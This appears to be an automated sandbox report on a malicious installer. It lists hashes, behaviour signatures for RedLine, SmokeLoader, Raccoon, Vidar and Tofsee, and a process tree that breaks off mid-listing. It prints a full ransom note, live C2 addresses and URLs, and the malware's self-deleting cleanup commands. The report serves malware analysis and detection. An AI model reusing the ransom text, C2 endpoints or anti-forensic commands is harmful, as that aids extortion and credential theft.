Resubmissions

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

05-07-2021 04:26

210705-z99jkt6lce 10

Analysis

  • max time kernel
    1789s
  • max time network
    1613s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-07-2021 10:43

General

  • Target

    setup_x86_x64_install - копия (15).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-ggGVjyTdgD Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0311ewgfDdSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk
URLs

https://we.tl/t-ggGVjyTdgD

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 21 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 52 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    PID:2724
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      PID:5892
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Adds Run key to start application
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:5904
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2664
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2616
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2432
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2400
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1944
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1416
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1340
            • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (15).exe
              "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (15).exe"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:3904
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3004
                • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\setup_install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2648
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c arnatic_1.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3292
                    • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_1.exe
                      arnatic_1.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3012
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                        6⤵
                          PID:4400
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im arnatic_1.exe /f
                            7⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1120
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 6
                            7⤵
                            • Delays execution with timeout.exe
                            PID:2448
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c arnatic_2.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3132
                      • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_2.exe
                        arnatic_2.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:2332
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c arnatic_3.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1228
                      • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_3.exe
                        arnatic_3.exe
                        5⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Modifies registry class
                        • Suspicious use of WriteProcessMemory
                        PID:2756
                        • C:\Windows\SysWOW64\rUNdlL32.eXe
                          "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                          6⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1232
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c arnatic_4.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2104
                      • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_4.exe
                        arnatic_4.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2760
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                          • Executes dropped EXE
                          PID:2716
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5024
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                            PID:6140
                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            6⤵
                              PID:2124
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c arnatic_5.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4068
                          • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_5.exe
                            arnatic_5.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3576
                            • C:\Users\Admin\AppData\Roaming\3324617.exe
                              "C:\Users\Admin\AppData\Roaming\3324617.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4144
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1908
                                7⤵
                                • Program crash
                                PID:5956
                            • C:\Users\Admin\AppData\Roaming\1597571.exe
                              "C:\Users\Admin\AppData\Roaming\1597571.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4248
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 2256
                                7⤵
                                • Program crash
                                PID:5504
                            • C:\Users\Admin\AppData\Roaming\5444584.exe
                              "C:\Users\Admin\AppData\Roaming\5444584.exe"
                              6⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:4176
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4784
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c arnatic_6.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3988
                          • C:\Users\Admin\AppData\Local\Temp\7zSCBBA8714\arnatic_6.exe
                            arnatic_6.exe
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:3588
                            • C:\Users\Admin\Documents\_jQasyLKIs2gxNXa21yjw4Ph.exe
                              "C:\Users\Admin\Documents\_jQasyLKIs2gxNXa21yjw4Ph.exe"
                              6⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:5044
                              • C:\Windows\SysWOW64\rUNdlL32.eXe
                                "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",setpwd
                                7⤵
                                • Loads dropped DLL
                                • Modifies registry class
                                PID:5976
                            • C:\Users\Admin\Documents\xEFQhdJa4nXZPhQox9vhy2OC.exe
                              "C:\Users\Admin\Documents\xEFQhdJa4nXZPhQox9vhy2OC.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:5012
                              • C:\Users\Admin\Documents\xEFQhdJa4nXZPhQox9vhy2OC.exe
                                C:\Users\Admin\Documents\xEFQhdJa4nXZPhQox9vhy2OC.exe
                                7⤵
                                • Executes dropped EXE
                                PID:476
                            • C:\Users\Admin\Documents\5zU4OyFOGAJjz95SiX_FFB_X.exe
                              "C:\Users\Admin\Documents\5zU4OyFOGAJjz95SiX_FFB_X.exe"
                              6⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:4996
                              • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:200
                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:3676
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                  • Executes dropped EXE
                                  PID:5780
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                  • Executes dropped EXE
                                  PID:4364
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                    PID:1244
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                      PID:4868
                                  • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:4108
                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                      8⤵
                                      • Loads dropped DLL
                                      PID:6032
                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Drops file in Program Files directory
                                    PID:1504
                                • C:\Users\Admin\Documents\nO5Q1TSJxxo4gnxnsbfTLwzC.exe
                                  "C:\Users\Admin\Documents\nO5Q1TSJxxo4gnxnsbfTLwzC.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:3324
                                  • C:\Users\Admin\Documents\nO5Q1TSJxxo4gnxnsbfTLwzC.exe
                                    "C:\Users\Admin\Documents\nO5Q1TSJxxo4gnxnsbfTLwzC.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:5520
                                • C:\Users\Admin\Documents\BOUs9dAdPFDSSggitDMshdtX.exe
                                  "C:\Users\Admin\Documents\BOUs9dAdPFDSSggitDMshdtX.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4976
                                  • C:\Users\Admin\Documents\app.exe
                                    "app.exe" (null)
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5660
                                    • C:\Users\Admin\Documents\app.exe
                                      "C:\Users\Admin\Documents\app.exe" (null)
                                      8⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      PID:4876
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1200
                                        9⤵
                                        • Program crash
                                        PID:5280
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 632
                                      8⤵
                                      • Program crash
                                      PID:5184
                                • C:\Users\Admin\Documents\huqDf24zIXLEcCjO0yn1tcu_.exe
                                  "C:\Users\Admin\Documents\huqDf24zIXLEcCjO0yn1tcu_.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:4960
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im huqDf24zIXLEcCjO0yn1tcu_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\huqDf24zIXLEcCjO0yn1tcu_.exe" & del C:\ProgramData\*.dll & exit
                                    7⤵
                                      PID:5972
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im huqDf24zIXLEcCjO0yn1tcu_.exe /f
                                        8⤵
                                        • Kills process with taskkill
                                        PID:4300
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 6
                                        8⤵
                                        • Delays execution with timeout.exe
                                        PID:5616
                                  • C:\Users\Admin\Documents\tpQSHmoSqIIP_fbv1EzbTu2m.exe
                                    "C:\Users\Admin\Documents\tpQSHmoSqIIP_fbv1EzbTu2m.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4852
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "tpQSHmoSqIIP_fbv1EzbTu2m.exe" /f & erase "C:\Users\Admin\Documents\tpQSHmoSqIIP_fbv1EzbTu2m.exe" & exit
                                      7⤵
                                        PID:5924
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im "tpQSHmoSqIIP_fbv1EzbTu2m.exe" /f
                                          8⤵
                                          • Kills process with taskkill
                                          PID:2196
                                    • C:\Users\Admin\Documents\RpT4hZ7cJYXMefFWexFNh9eS.exe
                                      "C:\Users\Admin\Documents\RpT4hZ7cJYXMefFWexFNh9eS.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4900
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                                        7⤵
                                        • Loads dropped DLL
                                        • Enumerates system info in registry
                                        • Suspicious use of FindShellTrayWindow
                                        PID:3956
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ff856074f50,0x7ff856074f60,0x7ff856074f70
                                          8⤵
                                            PID:2808
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1680 /prefetch:8
                                            8⤵
                                              PID:396
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:2
                                              8⤵
                                                PID:3948
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2252 /prefetch:8
                                                8⤵
                                                  PID:4432
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2344 /prefetch:1
                                                  8⤵
                                                    PID:4408
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2440 /prefetch:1
                                                    8⤵
                                                      PID:4988
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                                                      8⤵
                                                        PID:5188
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
                                                        8⤵
                                                          PID:5236
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
                                                          8⤵
                                                            PID:5312
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
                                                            8⤵
                                                              PID:5268
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
                                                              8⤵
                                                                PID:5608
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3556 /prefetch:8
                                                                8⤵
                                                                  PID:5028
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8
                                                                  8⤵
                                                                    PID:5364
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1448 /prefetch:8
                                                                    8⤵
                                                                      PID:5480
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:8
                                                                      8⤵
                                                                        PID:5372
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:8
                                                                        8⤵
                                                                          PID:5336
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
                                                                          8⤵
                                                                            PID:3876
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:8
                                                                            8⤵
                                                                              PID:3484
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5836 /prefetch:8
                                                                              8⤵
                                                                                PID:4276
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,13801470569392580544,14559536683289713403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:8
                                                                                8⤵
                                                                                  PID:4792
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
